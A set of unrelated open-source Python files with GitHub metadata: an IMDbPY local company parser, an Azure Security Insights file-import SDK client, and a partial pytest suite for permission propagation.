This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
from imdb.Movie import Movie
from utils import convBin, latin2utf, getLabel
import anydbm
def getCompanyName(companyID, compIF, compDF):
"""Return the company name for the specified companyID or None."""
try:
ifptr = open(compIF, 'rb')
except IOError, e:
import warnings
warnings.warn('Unable to access companies information, '
'please run the companies4local.py script: %s' % e)
return None
ifptr.seek(4L*companyID)
piddata = ifptr.read(4)
ifptr.close()
if len(piddata) != 4:
return None
idx = convBin(piddata, 'fulloffset')
try:
dfptr = open(compDF, 'rb')
except IOError, e:
import warnings
warnings.warn('Unable to access companies information, '
'please run the companies4local.py script: %s' % e)
return None
dfptr.seek(idx)
# Check companyID.
chID = dfptr.read(3)
if companyID != convBin(chID, 'companyID'):
return None
length = convBin(dfptr.read(2), 'longlength')
name = latin2utf(dfptr.read(length))
dfptr.close()
return name
def getCompanyFilmography(companyID, compIF, compDF, movieIF, movieKF):
"""Build a filmography list for the specified companyID."""
try:
ifptr = open(compIF, 'rb')
except IOError, e:
import warnings
warnings.warn('Unable to access companies information, '
'please run the companies4local.py script: %s' % e)
return None
ifptr.seek(4L*companyID)
piddata = ifptr.read(4)
ifptr.close()
if len(piddata) != 4:
return None
idx = convBin(piddata, 'fulloffset')
try:
dfptr = open(compDF, 'rb')
except IOError, e:
import warnings
warnings.warn('Unable to access companies information, '
'please run the companies4local.py script: %s' % e)
return None
dfptr.seek(idx)
# Check companyID.
chID = dfptr.read(3)
if companyID != convBin(chID, 'companyID'):
dfptr.close()
return None
length = convBin(dfptr.read(2), 'longlength')
# Skip company name.
latin2utf(dfptr.read(length))
nrItems = convBin(dfptr.read(3), 'nrCompanyItems')
filmography = {}
# Yes: kindID values are hard-coded in the companies4local.py script.
_kinds = {0: 'distributors', 1: 'production companies',
2: 'special effect companies', 3: 'miscellaneous companies'}
for i in xrange(nrItems):
kind = _kinds.get(ord(dfptr.read(1)))
if kind is None:
import warnings
warnings.warn('Unidentified kindID for a company.')
break
movieID = convBin(dfptr.read(3), 'movieID')
title = getLabel(movieID, movieIF, movieKF)
m = Movie(title=title, movieID=movieID, accessSystem='local')
filmography.setdefault(kind, []).append(m)
dfptr.close()
return filmography
def _convChID(companyID):
"""Return a numeric value for the given string, or None."""
if companyID is None:
return None
return convBin(companyID, 'companyID')
def getCompanyID(name, compNF):
"""Return a companyID for a name."""
try:
dbfile = anydbm.open(compNF, 'r')
except (anydbm.error, IOError), e:
import warnings
warnings.warn('Unable to access companies information, '
'please run the companies4local.py script: %s' % e)
return None
chID = dbfile.get(name.encode('latin_1', 'ignore'), None)
dbfile.close()
return _convChID(chID)
|
{
"content_hash": "e88b6b9acd9acf15257c79b85c6015df",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 76,
"avg_line_length": 33.99248120300752,
"alnum_prop": 0.6516257465162575,
"repo_name": "GetSomeBlocks/Score_Soccer",
"id": "9e91e8c6fae4f075478b02c58eecc9128e512ef8",
"size": "4521",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "resources/lib/IMDbPY/imdb/parser/local/companyParser.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "930"
},
{
"name": "C",
"bytes": "293000"
},
{
"name": "C#",
"bytes": "9664"
},
{
"name": "CSS",
"bytes": "24716"
},
{
"name": "D",
"bytes": "542"
},
{
"name": "HTML",
"bytes": "374176"
},
{
"name": "Java",
"bytes": "206"
},
{
"name": "Objective-C",
"bytes": "9421"
},
{
"name": "Python",
"bytes": "8744725"
},
{
"name": "Ruby",
"bytes": "6773"
},
{
"name": "Shell",
"bytes": "13600"
}
],
"symlink_target": ""
}
|
from typing import Any, Callable, Dict, IO, Iterable, Optional, TypeVar, Union, cast, overload
from urllib.parse import parse_qs, urljoin, urlparse
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
from .._serialization import Serializer
from .._vendor import _convert_request, _format_url_section
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_request(
resource_group_name: str,
workspace_name: str,
subscription_id: str,
*,
filter: Optional[str] = None,
orderby: Optional[str] = None,
top: Optional[int] = None,
skip_token: Optional[str] = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2022-09-01-preview")) # type: str
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/providers/Microsoft.SecurityInsights/fileImports",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"workspaceName": _SERIALIZER.url("workspace_name", workspace_name, "str", max_length=90, min_length=1),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
if filter is not None:
_params["$filter"] = _SERIALIZER.query("filter", filter, "str")
if orderby is not None:
_params["$orderby"] = _SERIALIZER.query("orderby", orderby, "str")
if top is not None:
_params["$top"] = _SERIALIZER.query("top", top, "int")
if skip_token is not None:
_params["$skipToken"] = _SERIALIZER.query("skip_token", skip_token, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_get_request(
resource_group_name: str, workspace_name: str, file_import_id: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2022-09-01-preview")) # type: str
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/providers/Microsoft.SecurityInsights/fileImports/{fileImportId}",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"workspaceName": _SERIALIZER.url("workspace_name", workspace_name, "str", max_length=90, min_length=1),
"fileImportId": _SERIALIZER.url("file_import_id", file_import_id, "str"),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_create_request(
resource_group_name: str, workspace_name: str, file_import_id: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2022-09-01-preview")) # type: str
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/providers/Microsoft.SecurityInsights/fileImports/{fileImportId}",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"workspaceName": _SERIALIZER.url("workspace_name", workspace_name, "str", max_length=90, min_length=1),
"fileImportId": _SERIALIZER.url("file_import_id", file_import_id, "str"),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="PUT", url=_url, params=_params, headers=_headers, **kwargs)
def build_delete_request(
resource_group_name: str, workspace_name: str, file_import_id: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2022-09-01-preview")) # type: str
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/providers/Microsoft.SecurityInsights/fileImports/{fileImportId}",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"workspaceName": _SERIALIZER.url("workspace_name", workspace_name, "str", max_length=90, min_length=1),
"fileImportId": _SERIALIZER.url("file_import_id", file_import_id, "str"),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="DELETE", url=_url, params=_params, headers=_headers, **kwargs)
class FileImportsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.securityinsight.SecurityInsights`'s
:attr:`file_imports` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list(
self,
resource_group_name: str,
workspace_name: str,
filter: Optional[str] = None,
orderby: Optional[str] = None,
top: Optional[int] = None,
skip_token: Optional[str] = None,
**kwargs: Any
) -> Iterable["_models.FileImport"]:
"""Gets all file imports.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param workspace_name: The name of the workspace. Required.
:type workspace_name: str
:param filter: Filters the results, based on a Boolean condition. Optional. Default value is
None.
:type filter: str
:param orderby: Sorts the results. Optional. Default value is None.
:type orderby: str
:param top: Returns only the first n results. Optional. Default value is None.
:type top: int
:param skip_token: Skiptoken is only used if a previous operation returned a partial result. If
a previous response contains a nextLink element, the value of the nextLink element will include
a skiptoken parameter that specifies a starting point to use for subsequent calls. Optional.
Default value is None.
:type skip_token: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either FileImport or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.securityinsight.models.FileImport]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", self._config.api_version)) # type: str
cls = kwargs.pop("cls", None) # type: ClsType[_models.FileImportList]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
workspace_name=workspace_name,
subscription_id=self._config.subscription_id,
filter=filter,
orderby=orderby,
top=top,
skip_token=skip_token,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("FileImportList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
list.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/providers/Microsoft.SecurityInsights/fileImports"} # type: ignore
@distributed_trace
def get(
self, resource_group_name: str, workspace_name: str, file_import_id: str, **kwargs: Any
) -> _models.FileImport:
"""Gets a file import.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param workspace_name: The name of the workspace. Required.
:type workspace_name: str
:param file_import_id: File import ID. Required.
:type file_import_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: FileImport or the result of cls(response)
:rtype: ~azure.mgmt.securityinsight.models.FileImport
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", self._config.api_version)) # type: str
cls = kwargs.pop("cls", None) # type: ClsType[_models.FileImport]
request = build_get_request(
resource_group_name=resource_group_name,
workspace_name=workspace_name,
file_import_id=file_import_id,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("FileImport", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/providers/Microsoft.SecurityInsights/fileImports/{fileImportId}"} # type: ignore
@overload
def create(
self,
resource_group_name: str,
workspace_name: str,
file_import_id: str,
file_import: _models.FileImport,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.FileImport:
"""Creates the file import.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param workspace_name: The name of the workspace. Required.
:type workspace_name: str
:param file_import_id: File import ID. Required.
:type file_import_id: str
:param file_import: The file import. Required.
:type file_import: ~azure.mgmt.securityinsight.models.FileImport
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: FileImport or the result of cls(response)
:rtype: ~azure.mgmt.securityinsight.models.FileImport
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
def create(
self,
resource_group_name: str,
workspace_name: str,
file_import_id: str,
file_import: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.FileImport:
"""Creates the file import.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param workspace_name: The name of the workspace. Required.
:type workspace_name: str
:param file_import_id: File import ID. Required.
:type file_import_id: str
:param file_import: The file import. Required.
:type file_import: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: FileImport or the result of cls(response)
:rtype: ~azure.mgmt.securityinsight.models.FileImport
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace
def create(
self,
resource_group_name: str,
workspace_name: str,
file_import_id: str,
file_import: Union[_models.FileImport, IO],
**kwargs: Any
) -> _models.FileImport:
"""Creates the file import.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param workspace_name: The name of the workspace. Required.
:type workspace_name: str
:param file_import_id: File import ID. Required.
:type file_import_id: str
:param file_import: The file import. Is either a model type or a IO type. Required.
:type file_import: ~azure.mgmt.securityinsight.models.FileImport or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: FileImport or the result of cls(response)
:rtype: ~azure.mgmt.securityinsight.models.FileImport
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", self._config.api_version)) # type: str
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[_models.FileImport]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(file_import, (IO, bytes)):
_content = file_import
else:
_json = self._serialize.body(file_import, "FileImport")
request = build_create_request(
resource_group_name=resource_group_name,
workspace_name=workspace_name,
file_import_id=file_import_id,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self.create.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("FileImport", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/providers/Microsoft.SecurityInsights/fileImports/{fileImportId}"} # type: ignore
def _delete_initial(
self, resource_group_name: str, workspace_name: str, file_import_id: str, **kwargs: Any
) -> Optional[_models.FileImport]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", self._config.api_version)) # type: str
cls = kwargs.pop("cls", None) # type: ClsType[Optional[_models.FileImport]]
request = build_delete_request(
resource_group_name=resource_group_name,
workspace_name=workspace_name,
file_import_id=file_import_id,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._delete_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 202:
deserialized = self._deserialize("FileImport", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_delete_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/providers/Microsoft.SecurityInsights/fileImports/{fileImportId}"} # type: ignore
@distributed_trace
def begin_delete(
self, resource_group_name: str, workspace_name: str, file_import_id: str, **kwargs: Any
) -> LROPoller[_models.FileImport]:
"""Delete the file import.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param workspace_name: The name of the workspace. Required.
:type workspace_name: str
:param file_import_id: File import ID. Required.
:type file_import_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either FileImport or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.securityinsight.models.FileImport]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", self._config.api_version)) # type: str
cls = kwargs.pop("cls", None) # type: ClsType[_models.FileImport]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial( # type: ignore
resource_group_name=resource_group_name,
workspace_name=workspace_name,
file_import_id=file_import_id,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("FileImport", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method = cast(
PollingMethod, ARMPolling(lro_delay, lro_options={"final-state-via": "location"}, **kwargs)
) # type: PollingMethod
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/providers/Microsoft.SecurityInsights/fileImports/{fileImportId}"} # type: ignore
|
{
"content_hash": "9a55d409de5a4baf3b1b004b2d5e11f4",
"timestamp": "",
"source": "github",
"line_count": 642,
"max_line_length": 255,
"avg_line_length": 44.848909657320874,
"alnum_prop": 0.6428993158059251,
"repo_name": "Azure/azure-sdk-for-python",
"id": "0f3781eda127d438b24cf1ecd10d6a03162512e1",
"size": "29293",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/securityinsight/azure-mgmt-securityinsight/azure/mgmt/securityinsight/operations/_file_imports_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
}
|
def test_public_propagation_from_project(data_builder, as_admin):
"""
Tests:
- 'public' is a propagated property
"""
project = data_builder.create_project()
session = data_builder.create_session()
acquisition = data_builder.create_acquisition()
payload = {'public': False}
r = as_admin.put('/projects/' + project, json=payload)
assert r.ok
r = as_admin.get('/projects/' + project)
assert r.ok and not r.json()['public']
r = as_admin.get('/sessions/' + session)
assert r.ok and not r.json()['public']
r = as_admin.get('/acquisitions/' + acquisition)
assert r.ok and not r.json()['public']
def test_public_propagation_from_session(data_builder, as_admin):
"""
Tests:
- propagation works from a session level
"""
session = data_builder.create_session()
acquisition = data_builder.create_acquisition()
payload = {'public': True}
r = as_admin.put('/sessions/' + session, json=payload)
assert r.ok
r = as_admin.get('/sessions/' + session)
assert r.ok and r.json()['public']
r = as_admin.get('/acquisitions/' + acquisition)
assert r.ok and r.json()['public']
def test_set_public_acquisition(data_builder, as_admin):
"""
Tests:
- setting a propagated property on an acquisition does not attempt to propagate (would hit Exception)
"""
acquisition = data_builder.create_acquisition()
payload = {'public': True}
r = as_admin.put('/acquisitions/' + acquisition, json=payload)
assert r.ok
# Test propagation of project permission changes
def test_add_and_remove_user_for_project_permissions(data_builder, as_admin):
"""
Tests:
- changing permissions at a project level triggers propagation
- additive change to list propagates properly
- change to list propagates properly
- removal from list propagates properly
"""
def get_user_in_perms(perms, uid):
for perm in perms:
if perm['_id'] == uid:
return perm
return None
project = data_builder.create_project()
session = data_builder.create_session()
acquisition = data_builder.create_acquisition()
user_id = 'propagation@user.com'
# Add user to project permissions
payload = {'_id': user_id, 'access': 'admin'}
r = as_admin.post('/projects/' + project + '/permissions', json=payload)
assert r.ok
r = as_admin.get('/projects/' + project)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user
r = as_admin.get('/sessions/' + session)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user
r = as_admin.get('/acquisitions/' + acquisition)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user
# Modify user permissions
payload = {'access': 'rw', '_id': user_id}
r = as_admin.put('/projects/' + project + '/permissions/' + user_id, json=payload)
assert r.ok
r = as_admin.get('/projects/' + project)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user and user['access'] == 'rw'
r = as_admin.get('/sessions/' + session)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user and user['access'] == 'rw'
r = as_admin.get('/acquisitions/' + acquisition)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user and user['access'] == 'rw'
# Remove user from project permissions
r = as_admin.delete('/projects/' + project + '/permissions/' + user_id, json=payload)
assert r.ok
r = as_admin.get('/projects/' + project)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user is None
r = as_admin.get('/sessions/' + session)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user is None
r = as_admin.get('/acquisitions/' + acquisition)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user is None
# Test group permission propagation
def test_add_and_remove_user_group_permission(data_builder, as_admin):
"""
Tests:
- changing permissions at a group level with flag triggers propagation
- additive change to list propagates properly
- change to list propagates properly
- removal from list propagates properly
"""
def get_user_in_perms(perms, uid):
for perm in perms:
if perm['_id'] == uid:
return perm
return None
group = data_builder.create_group()
project = data_builder.create_project()
session = data_builder.create_session()
acquisition = data_builder.create_acquisition()
user_id = 'propagation@user.com'
# Add user to group permissions
payload = {'_id': user_id, 'access': 'admin'}
r = as_admin.post('/groups/' + group + '/permissions', json=payload, params={'propagate': 'true'})
assert r.ok
# Add project without default group perms
r = as_admin.post('/projects', params={'inherit': 'false'}, json={'label': 'project2', 'group': group})
assert r.ok
project2 = r.json()['_id']
r = as_admin.get('/groups/' + group)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user
r = as_admin.get('/projects/' + project)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.json()['group'] == group
assert r.ok and user
r = as_admin.get('/sessions/' + session)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user
r = as_admin.get('/acquisitions/' + acquisition)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user
# Modify user permissions
payload = {'access': 'rw', '_id': user_id}
r = as_admin.put('/groups/' + group + '/permissions/' + user_id, json=payload, params={'propagate': 'true'})
assert r.ok
r = as_admin.get('/groups/' + group)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user and user['access'] == 'rw'
r = as_admin.get('/projects/' + project)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user and user['access'] == 'rw'
r = as_admin.get('/projects/' + project2)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
